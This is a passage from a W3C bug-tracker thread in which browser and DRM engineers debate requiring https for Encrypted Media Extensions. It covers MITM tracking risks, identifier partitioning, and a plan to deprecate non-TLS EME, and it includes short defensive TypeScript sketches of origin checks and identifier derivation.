> implementations [5] rather than finding ways to solve them.

Again, I think your expectations as to the speed of this process are unreasonable. There is no objection on my part to digging deeper into the problem. We invested in collecting data to inform the discussion.

> 
> When people opposed the W3C working on EME, you touted improved security and
> privacy, including from W3C review [6] and said that “EME is about
> *constraining* DRM on the web and subjecting it to more public, open,
> privacy and security review” and referred to “W3C supervision” [7]. However,
> now that we have such review and it is incompatible with your desires, you
> and others reject it.

I stand by all those statements. The solution we have in the field is a major improvement over what we had before. It's taken us 3-4 years of work to get there. I understand you want to go further, but I'm arguing that is not possible overnight.

I haven't rejected the TAG's review at all; I just disagree with your interpretation of it. As I said, it asks that, to the extent the issues cannot otherwise be mitigated, we require a secure origin. I'm arguing that it's important to figure out how the issues can otherwise be mitigated, because a secure origin is not a viable solution in the short term (unless the sub-resource integrity thing can be made to work, that is).

> 
> > > An open standardization process is not only about documenting interoperable
> > > behavior - a private group of UA implementors could do that on their own
> > > with much less overhead. It's about committing to take seriously the
> > > concerns of multiple stakeholders, to keep on working until there is
> > > consensus, and in deference to the value that brings a willingness to accept
> > > consensus-based outcomes.
> 
> It’s also not about documenting behavior of existing implementations
> regardless of the security, privacy, and interoperability properties. UA-DRM
> vendor pairs could also do that on their own and tell content providers how
> to write applications for their solution. It is about committing to take
> seriously the security and privacy of users and to maintain the one web
> platform. That is why we are at the W3C, getting the kind of supervision you
> alluded to in [7].

I agree. So, since we seem to be saying the same thing, why don't we all commit to take seriously the issues raised by the other participants and to invest in discussing those until we get to a resolution ? You could demonstrate that commitment by reverting the change.

> 
> [1] http://lists.w3.org/Archives/Public/public-html-media/2014Oct/0087.html
> [2] “browsers who choose to support only HTTPS will find their customers
> either still using plugins, or cut off from services - a different kind of
> fragmentation of the web.” -
> http://lists.w3.org/Archives/Public/www-tag/2014Oct/0096.html
> [3] e.g. http://lists.w3.org/Archives/Public/www-tag/2014Oct/0081.html
> [4] e.g. Comment #103, Comment #107
> [5] e.g. Comment #111
> [6]
> http://lists.w3.org/Archives/Public/public-restrictedmedia/2013Oct/0034.html
> [7]
> http://lists.w3.org/Archives/Public/public-restrictedmedia/2013Aug/0036.html
Comment 123 Henri Sivonen 2014-10-29 13:50:10 UTC
Ryan has been provoking me on Twitter about this topic. He wins in the sense of succeeding at getting me to say more here.

First of all, as has been pointed out in the www-tag thread, if one vendor restricts EME to https and others don't, the vendor who restricts EME to https is at a considerable competitive disadvantage when it comes to compatibility with video services. This means that requiring https conditionally, depending on the characteristics of the key system or the CDM, is not a solution that's actually going to work.

Mozilla has been down the road of putting the righteous aspirations shared by Google into practice while Google allowed them to remain mere aspirations and attempts to "signal" to the industry (http://blog.chromium.org/2011/01/html-video-codec-support-in-chrome.html). While Google has been "signaling", Chrome has been enjoying the compatibility benefits of supporting H.264, and Firefox has lost users to Chrome.

With that background, I hope it's understandable that I'm not jumping at the opportunity to make Firefox ship with EME restricted to https, when Chrome, IE and Safari are shipping (some prefix snapshot of) EME without such a restriction and would enjoy the competitive compatibility benefits if Firefox made it harder for sites to become compatible with Firefox+Access. (It's tough enough that EME-style DRM involves the sites having to operate a different key server for each browser when each browser is associated with a different key system.)

I'm sure that despite tweets like https://twitter.com/sleevi_/status/526783956264316928 Ryan is well familiar with the dynamics described at https://freedom-to-tinker.com/blog/jbonneau/poodle-and-the-fundamental-market-failure-of-browser-security/ . If the conflict between compatibility and security were not real, browsers, Chrome included, would have disabled SSLv3 proactively, rather than waiting for POODLE to prompt even an expression of hope to do so. Whereas SSLv3 may be a long-tail issue (and *still* didn't get proactively disabled), EME is relevant to popular services, so the situation is even worse than with SSLv3.

If the idea is to just get me to say that https-only is the righteous *goal* but no one is actually expected to ship a browser that way in the near term, as https://twitter.com/sleevi_/status/527007790150070272 suggests, I think it's a problem to pat ourselves on the back for signaling an https-only future while not actually addressing the privacy problems in the http-allowing reality that everyone is going to ship.

Since I care about the privacy properties of EME in general and EME-in-Firefox in particular and I expect Chrome, IE and Safari to keep shipping without an https-only restriction, I think it's not good enough to say that the spec restricting things to https only mitigates the privacy problems if https-only isn't actually what gets shipped. This is why I'm interested in finding ways to address the privacy issues without https, even though in principle, it's not cool to try to engineer for https avoidance and it's not good to be seen as trying to engineer for https avoidance. I then want to (try to at least) push those mitigations to be real in what Mozilla ships. I also hope that documenting solutions that don't require https in the spec helps improve the situation for users of other browsers, too.

It is worth noting that restricting EME to https origins is not a silver bullet. In particular, it doesn't address privacy problems related to what the site at the other end of the TLS pipe learns. That is, mandating https does not remove all the problems that a permanent Web-exposed unique identifier poses.

Also, restricting EME to https origins the way Chrome has restricted Web Crypto to https origins—i.e. requiring the origin that calls the API to be an https origin—is not good enough to address the concerns that Ryan raises in https://twitter.com/sleevi_/status/526586427656507394 and in https://www.w3.org/Bugs/Public/show_bug.cgi?id=26332#c114 . The MITM would inject an https iframe into http pages such that the https iframe loads from a MITM-controlled server that has a legitimately obtained certificate and serves a JS app to talk with a MITM-controlled key server that sees the identifier exposed by the key system. To make the DRM identifiers unavailable to an active MITM (unless the MITM forges certificates), the https-only restriction must apply to all origins in the whole chain of browsing contexts, from the browsing context using EME to the top-level browsing context. In other words, https://dvcs.w3.org/hg/html-media/rev/896eb33b68a2 does not actually address the threats that Ryan has brought forward.
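
To make that concrete, here is a minimal TypeScript sketch of the UA-side check being argued for, assuming a hypothetical BrowsingContext shape with a parent pointer and a serialized origin (an illustration only, not spec text or any browser's internals):

interface BrowsingContext {
  originUrl: string;              // serialized origin, e.g. "https://example.com"
  parent: BrowsingContext | null; // null for the top-level browsing context
}

function isPotentiallyTrustworthy(originUrl: string): boolean {
  // Simplified: real UAs also treat localhost, file:, etc. as trustworthy.
  return new URL(originUrl).protocol === "https:";
}

function emeAllowedFor(context: BrowsingContext): boolean {
  // Walk from the EME-using context up to the top-level context; a single
  // http ancestor is enough for an active MITM to inject an https iframe.
  for (let c: BrowsingContext | null = context; c !== null; c = c.parent) {
    if (!isPotentiallyTrustworthy(c.originUrl)) {
      return false;
    }
  }
  return true;
}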

On the other hand, if the spec required the sort of identifier and associated storage partitioning that Mozilla is on track to implement, i.e. partitioning by all of:
 1) Device-unique bits.
 2) The origin using EME.
 3) The origin of the top-level browsing context.
 4) A randomly-generated salt associated with the pair of #2 and #3, persisted until the user requests that the salt be forgotten.
...node locking would still be accomplished thanks to #1, but tracking across sites would be prevented and the user would have the opportunity to cause a discontinuity in tracking on a particular site. (A sketch of such a derivation follows below.)
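
As a rough illustration of the partitioning above (a sketch only - the hash choice, derivation function, and storage shape are assumptions of this example, not Firefox's actual implementation):

import { createHash, randomBytes } from "crypto";

// Per-(EME origin, top-level origin) salts, persisted until the user asks
// for a salt to be forgotten.
const saltStore = new Map<string, Buffer>();

function partitionedId(
  deviceUniqueBits: Buffer, // #1: device-unique bits, never exposed directly
  emeOrigin: string,        // #2: the origin using EME
  topOrigin: string         // #3: the origin of the top-level browsing context
): string {
  const key = `${emeOrigin}|${topOrigin}`;
  let salt = saltStore.get(key); // #4: the salt for this origin pair
  if (salt === undefined) {
    salt = randomBytes(32);
    saltStore.set(key, salt);
  }
  return createHash("sha256")
    .update(deviceUniqueBits)
    .update(emeOrigin)
    .update(topOrigin)
    .update(salt)
    .digest("hex");
}

// Forgetting the salt creates a tracking discontinuity for that site pair,
// while node locking survives because the device bits remain in the hash.
function forgetSalt(emeOrigin: string, topOrigin: string): void {
  saltStore.delete(`${emeOrigin}|${topOrigin}`);
}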

If the spec further required the key system to encrypt messages such that the identifier is visible only to the key server, then, in terms of identifier exposure, the result would be close (equivalent, even?) to the https case (as currently written, without the requirement for the whole browsing-context path up to the top level to be https-only), as far as the threat goes of a key-server-operating active MITM who injects EME-using iframes that connect to the MITM-operated key server.
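
A sketch of that property, assuming (purely for illustration) an RSA-OAEP wrap of the identifier under the key server's public key; a real key system would use its own provisioned keys and message framing:

import { constants, generateKeyPairSync, publicEncrypt } from "crypto";

// Stand-in for the key server's certified public key; in practice this
// would be provisioned to the CDM, not generated on the client.
const { publicKey } = generateKeyPairSync("rsa", { modulusLength: 2048 });

function wrapIdentifierForKeyServer(identifier: Buffer): Buffer {
  // Only the holder of the key server's private key can recover the
  // identifier, so an injected page relaying the key message over http
  // learns nothing about it.
  return publicEncrypt(
    { key: publicKey, padding: constants.RSA_PKCS1_OAEP_PADDING },
    identifier
  );
}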

Still, this leaves the question of what to do about such a MITM being able to surveil the user over time by always injecting the EME usage into a particular commonly-accessed http site (so as not to be tripped up by the partitioning by the origin of the top-level browsing context), perhaps to reassociate dynamic IP numbers with a persistent identity. As far as I can tell, this could be addressed by partitioning the identity on the temporal axis automatically instead of only when the user requests that the salt be forgotten. This should be logically possible to the extent that EME is used for streaming and for short-term offline rental implemented using licenses valid for the rental period and media data cached by a Service Worker.
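
For instance, automatic temporal partitioning could look something like this sketch (the 30-day period is an arbitrary example value, not a proposal):

import { createHash } from "crypto";

const EPOCH_MS = 30 * 24 * 60 * 60 * 1000; // example re-individualization period

function temporallyPartitionedId(baseId: string, now: number = Date.now()): string {
  // Folding a coarse time bucket into the derivation makes the CDM identity
  // roll over automatically, without waiting for a user-initiated reset.
  const epoch = Math.floor(now / EPOCH_MS);
  return createHash("sha256").update(baseId).update(String(epoch)).digest("hex");
}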

What problems (besides the overhead of re-individualization) do DRM vendors and service operators see with automatic temporal partitioning of the CDM identity?

The obvious problem I see with the efficacy of this kind of solution is that if the CDM identity renews automatically from time to time but the browser doesn't drop all site-specific data at the same time (and doing so automatically would be impractical), various client-side storage mechanisms could be used to correlate the old and new CDM identities in a manner analogous to cookie resurrection.

P.S. Regarding cookie equivalence: If cookies were designed today, they'd be at minimum origin-scoped and possibly https-only. Arguing mere cookie equivalence risks falling into the pattern that DJB characterizes as arguing against encrypting SNI because DNS traffic is unencrypted and arguing against encrypting DNS traffic because SNI is unencrypted.
Comment 124 Anne 2014-10-29 19:28:55 UTC
So it seems the problem we have is that the majority of implementations are shipping without requiring TLS. We could require TLS in the specification, but if the reality is that implementations do not require TLS, we might lose out on requiring things that make sense in a non-TLS world.

Now that we require TLS, how likely is it that existing implementations will change? I doubt new implementations will take the plunge given that EME compatibility is complicated enough.

Now that we require TLS, how likely is it that existing implementations will address non-TLS security and privacy concerns?

I'm all for requiring TLS, but in what timeframe can we move the implementations there? And how do we protect users meanwhile?
Comment 125 Anne 2014-10-29 21:51:48 UTC
Here's a proposal.

1) We work out how to make non-TLS EME as good as possible for end users and if UAs opt to support non-TLS (as everyone does at this point) they steer towards implementing those requirements.

2) We deprecate non-TLS EME in the specification and recommend against supporting it.

3) We set a date, one or two years from now, at which at least two UAs are willing to disable non-TLS EME.

4) We advertise this date through console warnings, evangelism, and perhaps even the specification.

This plan is similar to what has been proposed for WebRTC and geolocation and seems reasonable given existing non-TLS deployment.

(We also make sure to not fall in this non-TLS trap again for new APIs.)
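
To illustrate how a UA might phase this in (a sketch under assumed values - the flag day, function name, and error handling are placeholders, not anything agreed in this bug):

// Coordinated date after which non-TLS EME is disabled (placeholder value).
const NON_TLS_EME_FLAG_DAY: number = Date.parse("2016-06-01T00:00:00Z");

function checkEmeOriginPolicy(isSecureContext: boolean): void {
  if (isSecureContext) {
    return; // TLS origins are always allowed
  }
  if (Date.now() >= NON_TLS_EME_FLAG_DAY) {
    // A real UA would reject the MediaKeys promise, e.g. with a
    // NotSupportedError DOMException (step 3 of the proposal).
    throw new Error("EME requires a secure (TLS) origin");
  }
  // Step 4 of the proposal: advertise the date through console warnings.
  console.warn(
    "Deprecation: EME on non-TLS origins will be disabled on " +
      new Date(NON_TLS_EME_FLAG_DAY).toUTCString() +
      "; please migrate to https."
  );
}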
Comment 126 Henri Sivonen 2014-10-30 09:55:32 UTC
I'm still getting one-liner provocations on Twitter instead of a reply here. It seems the main issue is a lack of a clear enough endorsement of https on my part. So:

Restricting EME to https-only - in the sense of the origin using EME and the origins of the ancestor browsing contexts all being https origins - would be a significant improvement to the Key System-independent privacy characteristics of EME. (As noted, you fall short of the goals if the ancestor chain isn't part of the restriction.) If Microsoft and Google (the browser vendors whom we have to thank for the existence of EME, who are prominent DRM vendors in addition to being browser vendors and are therefore in a particularly strong position when it comes to EME) actually shipped that way, that would be awesome, assuming there are no non-EME ways to do identifier-exposing DRM, e.g. via ActiveX, NPAPI or Pepper plug-ins, that MITMs could poke instead.

I think exposing a permanent or origin-independent identifier to the other end of the TLS pipe would be a problem still, so I still think Mozilla-style partitioning of the CDM identity should be recommended even with https.

As long as the https requirement is a dead letter in the spec and Microsoft and Google actually ship with http permitted, users need other privacy solutions. I think an https goal should not be allowed as an excuse not to recommend how equivalent or almost equivalent privacy properties could be achieved on the Key System layer.
Comment 127 David Dorwin 2014-10-30 16:57:30 UTC
(In reply to Henri Sivonen from comment #123)

Putting user agents that do the right thing for their users at a disadvantage is definitely something we want to avoid. I raised this concern in the last paragraph of comment #0 as well as later.

Anne's proposal in comment #125 seems like a reasonable approach to avoid this. As Domenic noted in http://lists.w3.org/Archives/Public/www-tag/2014Oct/0100.html, this could even be testable ahead of time.

> Since I care about the privacy properties of EME in general and
> EME-in-Firefox in particular and I expect Chrome, IE and Safari to keep
> shipping without an https-only restriction, I think it's not good enough to
> say that the spec restricting things to https only mitigates the privacy
> problems if https-only isn't actually what gets shipped. This is why I'm
> interested in finding ways to address the privacy issues without https, even
> though in principle, it's not cool to try to engineer for https avoidance and
> it's not good to be seen as trying to engineer for https avoidance. I then
> want to (try to at least) push those mitigations to be real in what Mozilla
> ships. I also hope that documenting solutions that don't require https in
> the spec helps improve the situation for users of other browsers, too.

I expect that these user agents will follow the entire spec when they update their implementations to a future version of this spec. The same would apply to any other mitigations added to the spec.

I agree that we should work to address privacy and security issues in other ways as well. I welcome input and proposed text on other solutions/mitigations. There are some open bugs on these issues, but feel free to open others.

> It is worth noting that restricting EME to https origins is not a silver
> bullet. In particular, it doesn't address privacy problems related to what
> the site at the other end of the TLS pipe learns. That is, mandating https
> does not remove all the problems that a permanent Web-exposed unique
> identifier poses.

Agreed. We should address these issues as well. Bug 27165 and bug 27166 cover similar issues.

> Also, restricting EME to https origins the way Chrome has restricted Web
> Crypto to https origins—i.e. requiring the origin that calls the API to be
> an https origin—is not good enough to address the concerns that Ryan raises
> in https://twitter.com/sleevi_/status/526586427656507394 and in
> https://www.w3.org/Bugs/Public/show_bug.cgi?id=26332#c114 . The MITM would
> inject an https iframe into http pages such that the https iframe loads from
> a MITM-controlled server that has a legitimately obtained certificate and
> serves a JS app to talk with a MITM-controlled key server that sees the
> identifier exposed by the key system. To make the DRM identifiers
> unavailable to an active MITM (unless the MITM forges certificates), the
> https-only restriction must apply to all origins in the whole chain of
> browsing contexts, from the browsing context using EME to the top-level
> browsing context. In other words,
> https://dvcs.w3.org/hg/html-media/rev/896eb33b68a2 does not actually address
> the threats that Ryan has brought forward.

Do you have a proposal for how to modify the existing text to address this concern?

> On the other hand, if the spec required the sort of identifier and
> associated storage partitioning that Mozilla is on track to implement, i.e.
> partitioning by all of:
>  1) Device-unique bits.
>  2) The origin using EME.
>  3) The origin of the top-level browsing context.
>  4) A randomly-generated salt associated with the pair of #2 and #3,
> persisted until the user requests that the salt be forgotten.
> ...node locking would still be accomplished thanks to #1, but tracking
> across sites would be prevented and the user would have the opportunity to
> cause a discontinuity in tracking on a particular site.

Please file a bug to add normative text around identifiers. If it includes proposed text, even better.

> If the spec further required the key system to encrypt messages such that
> the identifier is visible only to the key server, then, in terms of
> identifier exposure, the result would be close (equivalent, even?) to the
> https case (as currently written, without the requirement for the whole
> browsing-context path up to the top level to be https-only), as far as the
> threat goes of a key-server-operating active MITM who injects EME-using
> iframes that connect to the MITM-operated key server.

You could file a bug for this too. I'm not sure what the normative text would look like.

> P.S. Regarding cookie equivalence: If cookies were designed today, they'd be
> at minimum origin-scoped and possibly https-only. Arguing mere cookie
> equivalence risks falling into the pattern that DJB characterizes as arguing
> against encrypting SNI because DNS traffic is unencrypted and arguing
> against encrypting DNS traffic because SNI is unencrypted.

For reference: similar points about cookies have also been made in comment #47 and http://lists.w3.org/Archives/Public/www-tag/2014Oct/0082.html.


(In reply to Henri Sivonen from comment #126)

> I think exposing a permanent or origin-independent identifier to the other
> end of the TLS pipe would be a problem still, so I still think Mozilla-style
> partitioning of the CDM identity should be recommended even with https.

I agree that this is still a problem we need to address. See above.

> I think an https goal should not be allowed as an excuse not to
> recommend how equivalent or almost equivalent privacy properties could be
> achieved on the Key System layer.

I don't think anyone has argued that. Authenticated origins provide important security and privacy properties, some of which cannot be obtained in other ways, but the security and privacy concerns are extensive (as demonstrated by the current considerations sections) and will require other solutions as well. If you have specific concerns and/or solutions, please file bugs.
Comment 128 David Dorwin 2014-10-30 17:07:48 UTC
(In reply to Anne from comment #125)
> Here's a proposal.
Thanks for making a proposal!
> 
> 1) We work out how to make non-TLS EME as good as possible for end users and
> if UAs opt to support non-TLS (as everyone does at this point) they steer
> towards implementing those requirements.
> 
> 2) We deprecate non-TLS EME in the specification and recommend against
> supporting it.
> 
> 3) We set a date, one or two years from now, at which at least two UAs
> are willing to disable non-TLS EME.
> 
> 4) We advertise this date through console warnings, evangelism, and perhaps
> even the specification.
> 
> This plan is similar to what has been proposed for WebRTC and geolocation
> and seems reasonable given existing non-TLS deployment.

I like this proposal in general. It gives content providers time to adapt, includes a normative requirement, informs authors about the upcoming change, and (somewhat) addresses the competitive disadvantage concern.

> (We also make sure to not fall in this non-TLS trap again for new APIs.)

Agreed. Maybe evaluating whether TLS is required should be added to the FPWD process.
Comment 129 Anne 2014-10-30 17:19:20 UTC
(In reply to David Dorwin from comment #128)
> Agreed. Maybe evaluating whether TLS is required should be added to the FPWD
> process.

http://lists.w3.org/Archives/Public/public-w3process/2014Oct/0191.html
Comment 130 Mark Watson 2014-10-31 02:47:45 UTC
I discussed the spec change with David and we agreed to change the text for the moment so that it is clear the behavior on unauthenticated origins is an open issue. The procedures still describe the check for an unauthenticated origin, but the subsequent behavior is noted as open with a reference to this bug.

There is no disagreement that there is a problem to be solved here. The disagreement is about the solution and it requires continued discussion.
Comment 131 Boris Zbarsky 2014-10-31 19:39:32 UTC
Comment 125 seems like a reasonable path forward to me, with UAs coordinating the flag day.
Comment 132 Henri Sivonen 2014-11-07 12:32:19 UTC
(In reply to David Dorwin from comment #127)
> (In reply to Henri Sivonen from comment #123)

> Anne's proposal in comment #125 seems like a reasonable approach to avoid
> this.

Yes.

> > Also, restricting EME to https origins the way Chrome has restricted Web
> > Crypto to https origins—i.e. requiring the origin that calls the API to be
> > an https origin—is not good enough to address the concerns that Ryan raises
> > in https://twitter.com/sleevi_/status/526586427656507394 and in
> > https://www.w3.org/Bugs/Public/show_bug.cgi?id=26332#c114 . The MITM would
> > inject an https iframe into http pages such that the https iframe loads from
> > a MITM-controlled server that has a legitimately obtained certificate and
> > serves a JS app to talk with a MITM-controlled key server that sees the
> > identifier exposed by the key system. To make the DRM identifiers
> > unavailable to an active MITM (unless the MITM forges certificates), the
> > https-only restriction must apply to all origins in the whole chain of
> > browsing contexts, from the browsing context using EME to the top-level
> > browsing context. In other words,
> > https://dvcs.w3.org/hg/html-media/rev/896eb33b68a2 does not actually address
> > the threats that Ryan has brought forward.
> 
> Do you have a proposal for how to modify the existing text to address this
> concern?

Bug 27271.

> Please file a bug to add normative text around identifiers. If it includes
> proposed text, even better.

Definition: bug 27268
Partitioning: bug 27269
Forgettability: bug 27270

> > If the spec further required the key system to encrypt messages such that
> > the identifier is visible only to the key server, then, in terms of
> > identifier exposure, the result would be close (equivalent, even?) to the
> > https case (as currently written, without the requirement for the whole
> > browsing-context path up to the top level to be https-only), as far as the
> > threat goes of a key-server-operating active MITM who injects EME-using
> > iframes that connect to the MITM-operated key server.
> 
> You could file a bug for this too. I'm not sure what the normative text
> would look like.

Bug 27272.
Comment 133 David Dorwin 2014-11-18 01:36:34 UTC
https://github.com/w3c/encrypted-media/commit/c937df6a02c57f2e0fb5f9fd683295d26f83c409 updates the existing step to reflect the current Mixed Content WD, which replaced "authenticated origin" with an algorithm.
Comment 134 David Dorwin 2015-04-18 00:40:06 UTC
https://github.com/w3c/encrypted-media/commit/5d38999268fa580f8fdb4ffcac2cb88ba3b83a8d implements the text agreed upon [1] at the f2f.

Mark will file GitHub issues to address items #2 and #3 from his third slide [2].

GitHub issue 49 [3] tracks updating the existing text to reference the new Privileged Contexts definition, which replaces the powerful features algorithm currently referenced.


[1] http://www.w3.org/2015/04/16-html-media-minutes.html#item03
[2] https://docs.google.com/presentation/d/18uM0Cijk_MI3op8VAa6MM6LIWtQGJ5WXjTHPmqyLa5g/view#slide=id.g76d7a3737_0_51
[3] https://github.com/w3c/encrypted-media/issues/49